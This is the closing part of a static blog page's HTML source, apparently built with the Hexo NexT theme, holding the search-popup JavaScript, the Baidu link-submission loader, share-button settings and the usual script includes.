            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  
  
  <link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">

  
  
  <script src="/lib/needsharebutton/needsharebutton.js"></script>

  <script>
    
    
      flOptions = {};
      
          flOptions.iconStyle = "box";
      
          flOptions.boxForm = "horizontal";
      
          flOptions.position = "middleRight";
      
          flOptions.networks = "Weibo,Douban,QQZone,Twitter,Facebook";
      
      new needShareButton('#needsharebutton-float', flOptions);
    
  </script>

  

  

  
  <script type="text/javascript" src="/js/src/js.cookie.js?v=5.1.4"></script>
  <script type="text/javascript" src="/js/src/scroll-cookie.js?v=5.1.4"></script>


  
  <script type="text/javascript" src="/js/src/exturl.js?v=5.1.4"></script>


</body>
</html>
